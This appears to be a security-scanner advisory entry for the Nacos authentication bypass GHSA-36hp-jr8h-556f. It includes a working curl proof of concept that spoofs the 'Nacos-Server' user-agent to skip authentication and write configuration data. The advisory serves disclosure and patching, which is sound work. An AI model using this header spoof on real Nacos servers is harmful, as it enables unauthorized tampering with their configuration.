QID 982636
QID 982636: Java (maven) Security Update for com.alibaba.nacos:nacos-common (GHSA-36hp-jr8h-556f)
When configured to use authentication (`-Dnacos.core.auth.enabled=true`) Nacos uses the `AuthFilter` servlet filter to enforce authentication. This filter has a [backdoor](https://github.com/alibaba/nacos/blob/5fa05aef52f7432aeab19fe53035431b9d8c91d9/core/src/main/java/com/alibaba/nacos/core/auth/AuthFilter.java#L78-L81) that enables Nacos servers to bypass this filter and therefore skip authentication checks. This mechanism relies on the `user-agent` HTTP header so it can be easily spoofed.
The following request to the `configuration` endpoint gets rejected as we are not providing any credentials:
```
curl -X POST "http://127.0.0.1:8848/nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld"
{"timestamp":"2020-12-02T14:33:57.154+0000","status":403,"error":"Forbidden","message":"unknown user!","path":"/nacos/v1/cs/configs"}
```
However the following one gets accepted by using the `Nacos-Server` user-agent header:
```
curl -X POST -A Nacos-Server "http://127.0.0.1:8848/nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld"
true
```
Successful exploitation of this vulnerability may affect the confidentiality, integrity, and availability of the targeted user.
- GHSA-36hp-jr8h-556f -
github.com/advisories/GHSA-36hp-jr8h-556f
CVEs related to QID 982636
| Advisory ID | Software | Component | Link |
|---|---|---|---|
| GHSA-36hp-jr8h-556f | com.alibaba.nacos:nacos-common |
|